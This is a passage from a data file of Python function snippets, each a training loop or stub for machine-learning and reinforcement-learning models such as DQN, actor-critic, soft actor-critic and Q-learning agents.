DataLoader(omni_train, batch_size=s_batch_num, sampler=train_sample_sampler)\n train_query_loader = DataLoader(omni_train, batch_size=q_batch_num, sampler=train_query_sampler)\n \n # start training\n scores = torch.zeros(NUM_CL,(NUM_EX+NUM_CL-1)).to(device=device, dtype=dtype)\n targets = torch.zeros(NUM_CL,(NUM_EX+NUM_CL-1)).to(device=device, dtype=dtype)\n sample_count = 0\n for i, (sample, sample_label) in enumerate(train_sample_loader):\n sample_count += 1\n idx = 0\n for j, (batch, batch_labels) in enumerate(train_query_loader):\n if sample_label != batch_labels[0]:\n k = np.random.randint(NUM_EX)\n query = batch[k,:,:,:].to(device=device, dtype=dtype)\n query = query.view(1,1,IMG_SIZE,IMG_SIZE)\n sample = sample.to(device=device, dtype=dtype)\n targets[i,idx] = make_target(sample_label, batch_labels[0])\n scores[i,idx] = model(sample,query)\n idx += 1\n \n elif sample_label == batch_labels[0]:\n for k in range(NUM_EX):\n query = batch[k,:,:,:].to(device=device, dtype=dtype)\n query = query.view(1,1,IMG_SIZE,IMG_SIZE)\n sample = sample.to(device=device, dtype=dtype)\n targets[i,idx] = make_target(sample_label, batch_labels[0])\n scores[i,idx] = model(sample,query)\n idx += 1\n \n targets = targets.view(-1)\n scores = scores.view(-1)\n \n # train and update model\n optimizer.zero_grad()\n #loss = F.binary_cross_entropy(scores, targets)\n loss = F.mse_loss(scores, targets)\n loss.backward()\n #nn.utils.clip_grad_norm_(model.parameters(),0.5)\n optimizer.step()\n\n # episodic updates\n if (episode+1)%100 == 0:\n print(\"episode:\",episode+1,\"loss\",loss.data)\n\n if (episode+1)%1000 == 0:\n ''' Test the model '''\n # make the samplers \n test_sample_sampler = SampleSampler(total_cl=659)\n sampled_classes = test_sample_sampler.cl_list\n sampled_examples = test_sample_sampler.ex_list\n test_query_sampler = QuerySampler(sampled_classes, sampled_examples, num_inst=1)\n\n # make the dataloaders\n s_batch_num = 1 # one shot each\n q_batch_num = 1 # one test each\n test_sample_loader = DataLoader(omni_test, batch_size=s_batch_num, sampler=test_sample_sampler)\n test_query_loader = DataLoader(omni_test, batch_size=q_batch_num, sampler=test_query_sampler)\n check_accuracy(test_sample_loader, test_query_loader, model)\n\n if (episode+1)%100000 == 0:\n \"\"\" Save as a draft model \"\"\"\n torch.save(model.state_dict(), PATH)", "def train():\n # YOUR TRAINING CODE GOES HERE", "def start_training(self):\n i = 0\n for _ in range(self.train_steps):\n print(f\"Start Training Step {i + 1}\")\n self.model.learn(total_timesteps=self.total_time_steps)\n self.model.save(self.save_path)\n print(f\"Finished Training Step {i + 1}\")\n i += 1", "def _train_epoch(self, model, tqdm_data,\n optimizer_disc=None, optimizer_gen=None):", "def train_epoch(self):\r\n for loader in self.loaders:\r\n if self.epoch % loader.epoch_interval == 0:\r\n self.cycle_dataset(loader)\r\n\r\n self._stats_new_epoch()\r\n self._write_tensorboard()\r\n print('{}th epoch train / eval done!'.format(self.epoch))", "def train_multiple_eps(self, env, no_episodes=200, horizon=1000, lr=0.1):\n\n\t\tr_vec = []\n\t\tep_len_vec = []\n\t\tfor i in range(no_episodes):\n\n\t\t\t# Run the agent for one episode and get a vector of rewards and a scalar for episode length\n\t\t\tr_ep, ep_len = self.train_one_eps(env, horizon=horizon, lr=lr)\n\n\t\t\t# Storing the information\n\t\t\tr_vec.append(r_ep)\n\t\t\tep_len_vec.append(ep_len)\n\n\t\treturn r_vec, ep_len_vec", "def train(self):\r\n\r\n for cur_epoch in range(self.model.cur_epoch_tensor.eval(self.sess), self.config.num_epochs + 1, 1):\r\n self.train_epoch(cur_epoch)\r\n self.model.global_step_assign_op.eval(session=self.sess, feed_dict={\r\n self.model.global_step_input: self.model.global_step_tensor.eval(self.sess) + 1})", "def train():\n pass", "def train_step(self):\n step_actions = self.get_step_actions()\n *_, dones, _ = tf.numpy_function(\n self.step_envs, [step_actions, True, True], self.batch_dtypes\n )\n for done_idx in tf.where(dones):\n gradient_steps = self.gradient_steps or self.episode_steps[done_idx[0]]\n self.update_weights(gradient_steps)\n self.episode_steps.assign(\n (self.episode_steps + self.step_increment) * (1 - dones)\n )", "def train(self, epoches, batch_size):\n def _padding_batch(x_inputs, y_inputs):\n # x_inputs is 2-d array\n max_length = max([len(x) for x in x_inputs])\n real_length = [len(x) for x in x_inputs]\n\n x_outputs = []\n for x in x_inputs:\n padding_size = max_length - len(x)\n x_outputs.append(\n np.concatenate([np.array(x), np.zeros(padding_size,\n dtype=\"int32\")]))\n return np.array(x_outputs), np.array(y_inputs), real_length\n\n\n x_inputs, y_inputs = self.convert_data_to_model_input(self.train_data)\n test_x_inputs, test_y_inputs = self.convert_data_to_model_input(self.test_data, add_unknow_words=False)\n test_x_inputs, test_y_inputs, test_real_length = _padding_batch(test_x_inputs,\n test_y_inputs)\n\n self.save_lexicon(\"log/lexicon\")\n\n train_x_inputs = x_inputs[0:11000]\n train_y_inputs = y_inputs[0:11000]\n\n validate_x_inputs = x_inputs[11000:]\n validate_y_inputs = y_inputs[11000:]\n validate_x_inputs, validate_y_inputs, validate_real_length = _padding_batch(\n validate_x_inputs, validate_y_inputs)\n\n assert len(train_y_inputs) == len(train_x_inputs)\n assert len(validate_y_inputs) == len(validate_x_inputs)\n print(\"train {} validate {} test {}\".format(len(train_y_inputs),\n len(validate_y_inputs), len(test_y_inputs)))\n assert len(self.vocab) == len(self.embeddings)\n\n # do training\n batches = len(train_y_inputs) // batch_size\n\n rnn_model = RnnTextClassifyModel(\n class_number=len(self.labels), learning_rate=0.01,\n gradients_norm=5, keep_rate=0.5, vocab_size=len(self.vocab),\n embedding_size=self.embedding_size, hidden_units_size=128)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # must assigned\n embedding_input = tf.constant(np.array(self.embeddings), dtype=tf.float32)\n assign_embedding_op = tf.assign(rnn_model.embeddings, embedding_input)\n embedding_in_graph = sess.run(assign_embedding_op);\n\n global_step = 0\n for epoch in range(epoches):\n print(\"training @ epoch \", epoch)\n for i in range(batches):\n\n x_inputs_batch = train_x_inputs[i * batch_size:(i+1) *\n batch_size]\n y_inputs_batch = train_y_inputs[i * batch_size:(i+1) *\n batch_size]\n x_inputs_batch, y_inputs_batch, real_length = _padding_batch(\n x_inputs_batch, y_inputs_batch)\n\n loss_val, _ = sess.run(\n [rnn_model.loss, rnn_model.train_op],\n {rnn_model.x_holder:x_inputs_batch,\n rnn_model.y_holder:y_inputs_batch,\n rnn_model.sequence_length: real_length})\n\n print(\"loss {} @ step {}\".format(loss_val, global_step))\n\n #saver.save(sess, \"log/cnn_model\", global_step=global_step)\n global_step += 1\n\n if global_step % 100 == 0:\n print(\"______validating\")\n accuracy_val = sess.run(rnn_model.accuracy,\n {rnn_model.x_holder: validate_x_inputs,\n rnn_model.y_holder: validate_y_inputs,\n rnn_model.sequence_length: validate_real_length,\n rnn_model.keep_rate : 1.0})\n print(\"______valiation_accuracy {} at step {}\".format(accuracy_val,\n global_step))\n\n accuracy_val = sess.run(rnn_model.accuracy,\n {rnn_model.x_holder: x_inputs_batch,\n rnn_model.y_holder: y_inputs_batch,\n rnn_model.sequence_length: real_length,\n rnn_model.keep_rate : 1.0})\n print(\"______train_accuracy {} at step {}\".format(accuracy_val,\n global_step))\n\n\n if batches * batch_size < len(train_y_inputs):\n x_inputs_batch = train_x_inputs[batches * batch_size:]\n y_inputs_batch = train_y_inputs[batches * batch_size:]\n x_inputs_batch, y_inputs_batch, real_length = _padding_batch(\n x_inputs_batch, y_inputs_batch)\n\n loss_val, _ = sess.run(\n [rnn_model.loss, rnn_model.train_op],\n {rnn_model.x_holder:x_inputs_batch,\n rnn_model.y_holder:y_inputs_batch,\n rnn_model.sequence_length: real_length})\n\n print(\"loss {} @ step {}\".format(loss_val, global_step))\n global_step += 1\n\n # do evaluate on test data\n print(\"______test accuracy on epoch \", epoch)\n accuracy_val = sess.run(rnn_model.accuracy,\n {rnn_model.x_holder: test_x_inputs,\n rnn_model.y_holder: test_y_inputs,\n rnn_model.sequence_length: test_real_length,\n rnn_model.keep_rate : 1.0})\n\n print(\"______test_accuracy {} at epoch {}\".format(accuracy_val,\n epoch))", "def train_workers(self):\n args = dict(actor=self.actor,\n critic=self.critic,\n gamma=self.gamma,\n lamda=self.lamda or self.gamma / 1.005,\n device=self.device,\n optimizers=[self.actor_optimizer, self.critic_optimizer])\n workers = [Worker(i, self.action_size, self.state_size, **args)\n for i in range(self.n_workers)\n ]\n\n print(f'Worker count: {len(workers)}')\n\n for worker in workers:\n worker.start()\n\n while len(constants.scores) < self.n_steps:\n time.sleep(400) # save checkpoint every 400 ms\n\n print(f'\\nCurrent scores: {constants.scores}')\n\n self.save(constants.episode)\n print(f'\\nCheckpoint saved at episode: {constants.episode}\\n')", "def train_fru(model, epochs=EPOCHS):\n train(model, epochs=epochs, dataset=FRUDataset)", "def train_multiple_eps_dynamic(self, env, no_episodes=200, ng_int=50, horizon=1000, lr=0.1):\n\n\t\tr_vec = []\n\t\tep_len_vec = []\n\t\ttasks = 0\n\t\tfor i in range(no_episodes):\n\t\t\tif(i % ng_int == 0):\n\t\t\t\tgoal_index = [0, 12, 156, 168]\n\t\t\t\tnew_goal = [goal_index[tasks]]\n\t\t\t\ttasks += 1\n\t\t\t\tenv.reset(loc_r=new_goal, loc_t=new_goal)\n\t\t\t\t# new_goal = sample(env.listGoalStates(), 1)\n\t\t\t\t# env.reset(loc_r=new_goal, loc_t=new_goal)\n\n\t\t\t# Run the agent for one episode and get a vector of rewards and a scalar for episode length\n\t\t\tr_ep, ep_len = self.train_one_eps(env, horizon=horizon, lr=lr)\n\n\t\t\t# Storing the information\n\t\t\tr_vec.append(r_ep)\n\t\t\tep_len_vec.append(ep_len)\n\n\t\treturn r_vec, ep_len_vec", "def train(self, environment, seed=0):\n # set the seeds\n np.random.seed(seed)\n environment.seed(seed)\n # prepare the file for the results\n save_results = SaveResults()\n save_results.set_seed(seed)\n\n # prepare to display the states\n if self.parameters[\"display_environment\"]:\n self.show_render = ShowRender()\n\n for t in tqdm(range(1, self.parameters[\"number_episodes\"] + 1)):\n self._train_simulate(environment, t)\n\n if not t % 200:\n save_results.write_message_in_a_file(\"score\", self.score)", "def fit(self, env, env_eval, num_iterations, max_episode_length=None):\n train_counter = 0;\n eval_res_hist = np.zeros((1,3));\n\n time_this, ob_this, is_terminal = env.reset()\n\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n\n setpoint_this = ob_this[6:8]\n \n this_ep_length = 0;\n flag_print_1 = True;\n flag_print_2 = True;\n action_counter = 0;\n \n for step in range(num_iterations):\n #Check which stage is the agent at. If at the collecting stage,\n #then the actions will be random action.\n if step <= self._num_burn_in:\n if flag_print_1:\n logging.info (\"Collecting samples to fill the replay memory...\");\n flag_print_1 = False;\n\n action_mem = self.select_action(None, stage = 'collecting');\n action = self._policy.process_action(setpoint_this, action_mem)\n\n else:\n if flag_print_2:\n logging.info (\"Start training process...\");\n flag_print_2 = False;\n\n obs_this_net = self._preprocessor.process_observation_for_network(\n ob_this, self._min_array, self._max_array)\n \n state_this_net = np.append(obs_this_net[0:13], obs_this_net[14:]).reshape(1,16)\n\n action_mem = self.select_action(state_this_net, stage = 'training')\n # covert command to setpoint action \n action = self._policy.process_action(setpoint_this, action_mem) \n\n action_counter = action_counter + 1 if action_counter < 4 else 1;\n\n time_next, ob_next, is_terminal = env.step(action)\n ob_next = self._preprocessor.process_observation(time_next, ob_next)\n \n setpoint_next = ob_next[6:8]\n \n #check if exceed the max_episode_length\n if max_episode_length != None and \\\n this_ep_length >= max_episode_length:\n is_terminal = True;\n\n #save sample into memory \n self._memory.append(Sample(ob_this, action_mem, ob_next\n , is_terminal))\n\n \n #Check which stage is the agent at. If at the training stage,\n #then do the training\n if step > self._num_burn_in:\n #Check the train frequency\n if action_counter % self._train_freq == 0 \\\n and action_counter > 0:\n action_counter = 0;\n #Eval the model\n if train_counter % self._eval_freq == 0:\n eval_res = self.evaluate(env_eval, self._eval_epi_num\n , show_detail = True);\n eval_res_hist = np.append(eval_res_hist\n , np.array([step\n , eval_res[0], eval_res[1]]).reshape(1, 3)\n , axis = 0);\n np.savetxt(self._log_dir + '/eval_res_hist.csv'\n , eval_res_hist, delimiter = ',');\n logging.info ('Global Step: %d, '%(step), 'evaluation average \\\n reward is %0.04f, average episode length is %d.'\\\n %eval_res);\n \n \n #Sample from the replay memory\n samples = self._preprocessor.process_batch(\n self._memory.sample(self._batch_size), \n self._min_array, self._max_array);\n #Construct target values, one for each of the sample \n #in the minibatch\n samples_x = None;\n targets = None;\n for sample in samples:\n sample_s = np.append(sample.obs[0:13], sample.obs[14:]).reshape(1,16)\n sample_s_nex = np.append(sample.obs_nex[0:13], \n sample.obs_nex[14:]).reshape(1,16)\n sample_r = self._preprocessor.process_reward(sample.obs_nex[12:15])\n\n target = self.calc_q_values(sample_s);\n a_max = self.select_action(sample_s_nex, stage = 'greedy');\n \n \n\n if sample.is_terminal:\n target[0, sample.a] = sample_r;\n else:\n target[0, sample.a] = (sample_r\n + self._gamma \n * self.calc_q_values_1(\n sample_s_nex)[0, a_max]);\n if targets is None:\n targets = target;\n else:\n targets = np.append(targets, target, axis = 0);\n if samples_x is None:\n samples_x = sample_s;\n else:\n samples_x = np.append(samples_x, sample_s, axis = 0);\n #Run the training\n \n \n feed_dict = {self._state_placeholder:samples_x\n ,self._q_placeholder:targets}\n sess_res = self._sess.run([self._train_op, self._loss]\n , feed_dict = feed_dict);\n \n #Update the target parameters\n if train_counter % self._target_update_freq == 0:\n self.update_policy();\n logging.info('Global Step %d: update target network.' \n %(step));\n #Save the parameters\n if train_counter % self._save_freq == 0 or step + 1 == num_iterations:\n checkpoint_file = os.path.join(self._log_dir\n , 'model_data/model.ckpt');\n self._saver.save(self._sess\n , checkpoint_file, global_step=step);\n \n if train_counter % 100 == 0:\n logging.info (\"Global Step %d: loss %0.04f\"%(step, sess_res[1]));\n # Update the events file.\n summary_str = self._sess.run(self._summary, feed_dict=feed_dict)\n self._summary_writer.add_summary(summary_str, train_counter);\n self._summary_writer.add_graph(self._sess.graph);\n self._summary_writer.flush()\n \n train_counter += 1;\n \n #check whether to start a new episode\n if is_terminal:\n time_this, ob_this, is_terminal = env.reset()\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n setpoint_this = ob_this[6:8]\n\n this_ep_length = 0;\n action_counter = 0;\n else:\n ob_this = ob_next\n setpoint_this = setpoint_next\n time_this = time_next\n this_ep_length += 1;", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def TrainOneStep(self):\n pass", "def run(num_epochs, encoded_dim):\n # for patient_ in get_patient_ids():\n for patient_ in ['16']:\n print(\"Starting on index: \" + str(patient_))\n training_ae(num_epochs, encoded_dim, patient_, True)\n print(\"Completed \" + str(patient_) + \" reconstruction and encoding, saved test data to assess performance\")", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def _train_epoch(self, epoch):\n raise NotImplementedError", "def train_by_episode(self, last_value=0):\n # implements A2C training from the last state\n # to the first state\n # discount factor\n gamma = 0.95\n r = last_value\n # the memory is visited in reverse as shown\n # in Algorithm 10.5.1\n for item in self.memory[::-1]:\n [step, state, next_state, reward, done] = item\n # compute the return\n r = reward + gamma*r\n item = [step, state, next_state, r, done]\n # train per step\n # a2c reward has been discounted\n self.train(item)", "def train(env, agents, data_log, n_episodes=10000, n_steps=None, generate_val_data=False, record_env=None, trainer=None):\n # Setup logging and start code\n logger = logging.getLogger('root')\n step_tot = 0\n logger.info(env.observation_space[0].high)\n alphas = [agent.alpha for agent in trainer.agents]\n data_log.log_var(\"alphas\", alphas)\n\n ep_generator = range(n_episodes) if n_episodes else itertools.count()\n # Start training\n for i in ep_generator:\n # Do some logging\n logger.info(\"episode:\" + str(i))\n data_log.set_episode(i)\n\n # Periodically store networks\n if i % 250 == 0: #was 25\n store_networks(trainer, agents, data_log)\n\n # Run a single episode\n score, step, extra_data = run_episode(env, agents, render=False, store_data=True, trainer=trainer)\n\n # Do more logging\n logger.info(\"Score: \" + str(score))\n step_tot += step\n data_log.set_step(step_tot)\n data_log.log_var(\"score\", score)\n alphas = [agent.alpha for agent in trainer.agents]\n data_log.log_var(\"alphas\", alphas)\n\n # Break training loop\n if n_steps and step_tot > n_steps:\n break\n\n #Periodically save logs\n if i % 50 == 0: #was 5\n logger.info(\"Saving log...\")\n data_log.save()\n logger.info(\"Saved log\")\n\n # Save logs one last time\n logger.info(\"Saving log...\")\n data_log.save()\n logger.info(\"Saved log\")\n return", "def Q_learning_train(env,alpha,gamma,epsilon,episodes):\n %time\n # For plotting metrics\n all_epochs = []\n all_penalties = []\n rewards = []\n \n #Initialize Q table of 22500 x 8 size (22500 states and 8 actions) with all zeroes\n q_table = np.zeros([env.observation_space.n, env.action_space.n]) \n \n for i in range(1, episodes+1):\n state = env.reset()\n episode_rewards = []\n\n epochs, penalties, reward, = 0, 0, 0\n done = False\n\n while not done:\n if random.uniform(0, 1) < epsilon:\n action = env.action_space.sample() # Explore action space randomly\n else:\n action = np.argmax(q_table[state]) # Exploit learned values by choosing optimal values\n\n next_state, reward, done, info = env.step(action) \n\n old_value = q_table[state, action]\n next_max = np.max(q_table[next_state])\n\n new_value = (1 - alpha) * old_value + alpha * (reward + gamma * next_max)\n q_table[state, action] = new_value\n\n if reward == -10:\n penalties += 1\n \n\n state = next_state\n episode_rewards.append(reward)\n epochs += 1\n \n if done == True:\n break \n if epochs == 1000:\n break \n rewards.append(np.sum(episode_rewards))\n \n if i % 1000 == 0:\n clear_output(wait=True)\n print(f\"Episode: {i}\")\n \n \n print(\"Training finished.\\n\")\n \n plt.plot(savgol_filter(rewards, 1001, 3, mode = \"interp\"))\n plt.title(\"Smoothened training reward per episode\", pad = 30, size = BIGGER_SIZE)\n plt.legend()\n plt.xlabel('Episodes', labelpad = 20);\n plt.ylabel('Total Reward', labelpad = 20);\n plt.tick_params(axis='both', which='major');\n plt.tick_params(axis='both', which='minor');\n #plt.xlim(0, 60000);\n #plt.ylim(0,50)\n #plt.xticks(np.arange(0, episodes+1, 5000));\n #plt.yticks(np.arange(min(rewards), max(rewards)+1, 1000));", "def train(self):\n\t\tself.model.fit(self.training_data, self.training_labels)", "def learn(self):\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n log.info(f'Starting Iter #{i} ...')\n # examples of the iteration\n if not self.skipFirstSelfPlay or i > 1:\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n for _ in tqdm(range(self.args.numEps), desc=\"Self Play\"):\n self.mcts = MCTS(self.game, self.nnet, self.args) # reset search tree\n iterationTrainExamples += self.executeEpisode()\n\n # save the iteration examples to the history \n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n log.warning(\n f\"Removing the oldest entry in trainExamples. len(trainExamplesHistory) = {len(self.trainExamplesHistory)}\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1) \n self.saveTrainExamples(i - 1)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n log.info('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game)\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare)\n\n log.info('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) < self.args.updateThreshold:\n log.info('REJECTING NEW MODEL')\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n else:\n log.info('ACCEPTING NEW MODEL')\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='best.pth.tar')", "def train(nepochs, model): \n if model == 'cnn':\n return gennet.train_cnn(nepochs, 'Resnet50')\n elif model == 'logreg':\n return gennet.train_logreg('Resnet50')", "def train(self,\n num_episodes = 100,\n num_steps = 500000,\n max_steps_per_episode = 10000,\n target_interval = 10000,\n learning_interval = 4,\n frame_skip = 1,\n warmup_steps = None,\n pretrain_steps = None,\n output_freq = 50,\n save_freq = 5, \n store_memory = False):\n \n # prefill memory with random transitions if requested\n if warmup_steps is not None:\n self._random_warmup(warmup_steps)\n \n # pretrain the agent on its on own memory\n if pretrain_steps is not None:\n self._pretrain(pretrain_steps, target_interval)\n \n # logging initialization\n self._score, self._q_values, self._losses = 0., [], []\n raw_frames = np.zeros(shape = (max_steps_per_episode, *self.env._unprocessed_frame.shape), dtype = np.uint8)\n\n episode_idx = 0\n while episode_idx < num_episodes or self._step_counter < num_steps:\n # reset environment and get first state\n self._start_episode()\n \n for i in range(max_steps_per_episode):\n \n #-------------------------------------------------------------------------------#\n #####################\n # Interactive Phase #\n #####################\n \n # choose an action, observe reactions of the environment and\n # add this experience to the agent's memory \n if self._step_counter % frame_skip == 0: \n action = self._make_decision()\n new_frame, reward, done, _ = self.env.step(action)\n self.memory.add_experience(action, reward, new_frame, 1, done)\n \n # update current state\n self._current_state[0, :(self.num_stacked_frames-1)] = self._current_state[0, 1:]\n self._current_state[0, self.num_stacked_frames-1] = new_frame\n #-------------------------------------------------------------------------------#\n \n \n #-------------------------------------------------------------------------------#\n ##################\n # Learning Phase #\n ##################\n \n # perform a parameter update of the current policy model\n if self._step_counter % learning_interval == 0:\n self._batch_update()\n \n # update the target model\n if self._step_counter % target_interval == 0:\n self._update_target_model()\n #-------------------------------------------------------------------------------#\n \n # logging\n self._score += self.env._unprocessed_reward\n raw_frames[i] = self.env._unprocessed_frame\n \n \n self._step_counter += 1\n \n if self.env.was_real_done:\n self.logger.add_episode_logs(self._step_counter, self._score, self._q_values, self._losses, raw_frames[:i])\n self._score, self._q_values, self._losses = 0., [], []\n break\n \n if done:\n self.env.reset()\n \n \n if not self.env.was_real_done:\n self.memory.add_experience(action, reward, new_frame, 1, True)\n self.logger.add_episode_logs(self._step_counter, self._score, self._q_values, self._losses, raw_frames[:i])\n self._score, self._q_values, self._losses = 0., [], []\n \n if episode_idx%(num_episodes/output_freq)==0:\n validation_score, validation_frames = self.test(record = True, max_steps_per_episode = max_steps_per_episode)\n #validation_score, validation_frames = 0, []\n lower_idx = int(clip(episode_idx-(num_episodes/output_freq)+1, 0, num_episodes-1))\n self.logger.show_progress(lower_idx, episode_idx, validation_score, validation_frames, self.policy_network.model)\n \n if episode_idx%(num_episodes/save_freq)==0:\n self.logger.make_plots()\n self.logger.save_all(self.policy_network.model, self.memory, store_memory)\n \n \n\n episode_idx += 1 \n print('==========================\\ntraining session completed\\n==========================\\n\\n\\n=======\\nSummary\\n======='\n )\n self.logger.show_progress(0, num_episodes, summary = True)\n self.logger.make_plots()\n self.logger.save_all(self.policy_network.model, self.memory, store_memory)", "def _Train(self, limit):\n if len(self.Memory)>BATCH_SIZE: \n # Limit of Agents to Train\n for i in range(limit): \n # 'n' number of rounds to train \n for _ in range(50):\n # Get Batch Data\n experiances = self.Memory.sample()\n # Train Models\n self._Learn(self.Actor[i], self.ActorTarget, self.actorOpt[i], experiances)", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def train_episode(self, max_episode_length):\n\n # Populate the buffer\n self.populate_buffer(max_episode_length)\n\n # weight updates\n replay_samples = self.replay_buffer.sample(self.buffer_sample_size)\n state_batch = torch.from_numpy(replay_samples[0]).to(DEVICE)\n action_batch = torch.from_numpy(replay_samples[1]).to(DEVICE)\n reward_batch = (\n torch.from_numpy(replay_samples[2]).to(DEVICE).unsqueeze(1)\n )\n next_state_batch = torch.from_numpy(replay_samples[3]).to(DEVICE)\n dones = (\n torch.from_numpy(replay_samples[4])\n .type(torch.long)\n .to(DEVICE)\n .unsqueeze(1)\n )\n\n # alpha must be clamped with a minumum of zero, so use exponential.\n alpha = self.log_alpha.exp().detach()\n\n with torch.no_grad():\n # Figure out value function\n next_actions, log_next_actions, _ = self.policy.sample(\n next_state_batch\n )\n target_q1, target_q2 = self.avg_q_net(\n next_state_batch, next_actions\n )\n target_q = torch.min(target_q1, target_q2)\n next_state_values = target_q - alpha * log_next_actions\n\n # Calculate Q network target\n done_floats = dones.type(torch.float)\n q_target = reward_batch.clone()\n q_target += self.gamma * done_floats * next_state_values\n\n # Q net outputs values for all actions, so we index specific actions\n q1, q2 = self.q_net(state_batch, action_batch)\n q1_loss = F.mse_loss(q1, q_target)\n q2_loss = F.mse_loss(q2, q_target)\n\n # policy loss\n actions_pi, log_probs_pi, action_dist = self.policy.sample(state_batch)\n q1_pi, q2_pi = self.q_net(state_batch, actions_pi)\n q_pi = torch.min(q1_pi, q2_pi)\n policy_loss = ((alpha * log_probs_pi) - q_pi).mean()\n\n # update parameters\n self.q_optim.zero_grad()\n q1_loss.backward()\n self.q_optim.step()\n\n self.q_optim.zero_grad()\n q2_loss.backward()\n self.q_optim.step()\n\n self.policy_optim.zero_grad()\n policy_loss.backward()\n self.policy_optim.step()\n\n # automatic entropy tuning\n alpha_loss = (\n self.log_alpha * (log_probs_pi + self.entropy_target).detach()\n )\n alpha_loss = -alpha_loss.mean()\n\n if self.entropy_tuning:\n self.alpha_optim.zero_grad()\n alpha_loss.backward()\n self.alpha_optim.step()\n\n # Step average Q net\n move_average(self.q_net, self.avg_q_net, self.tau)\n\n # logging\n self.tbx_logger(\n {\n \"loss/q1 loss\": q1_loss.item(),\n \"loss/q2 loss\": q2_loss.item(),\n \"loss/pi loss\": policy_loss.item(),\n \"loss/alpha loss\": alpha_loss.item(),\n \"Q/avg_q_target\": q_target.mean().item(),\n \"Q/avg_q1\": q1.mean().item(),\n \"Q/avg_q2\": q2.mean().item(),\n \"Q/avg_reward\": reward_batch.mean().item(),\n \"Q/avg_V\": next_state_values.mean().item(),\n \"H/alpha\": alpha.item(),\n \"H/pi_entropy\": action_dist.entropy().mean(),\n \"H/pi_log_pi\": log_probs_pi.mean(),\n },\n self.training_i,\n )\n\n self.training_i += 1\n self.checkpointer.increment_counter()", "def TrainEpoch(ss):\n ss.StopNow = False\n curEpc = ss.TrainEnv.Epoch.Cur\n while True:\n ss.TrainTrial()\n if ss.StopNow or ss.TrainEnv.Epoch.Cur != curEpc:\n break\n ss.Stopped()", "def enjoy_model(env, obs_placeholder, epsilon_placeholder, stochastic_placeholder,\n output_actions, sess, num_episodes=1):\n for _ in range(num_episodes):\n obs, done = env.reset(), False\n episode_rew = 0\n while not done:\n env.render()\n time.sleep(0.02)\n feed_dict = {obs_placeholder: np.array(obs).reshape((1,) + obs.shape),\n epsilon_placeholder: 0.0,\n stochastic_placeholder: False}\n action = sess.run(output_actions, feed_dict)[0]\n obs, rew, done, _ = env.step(action)\n episode_rew += rew\n print(\"Episode rew\", episode_rew)\n time.sleep(1)", "def _train_epochs(self, data, model, n_epochs, 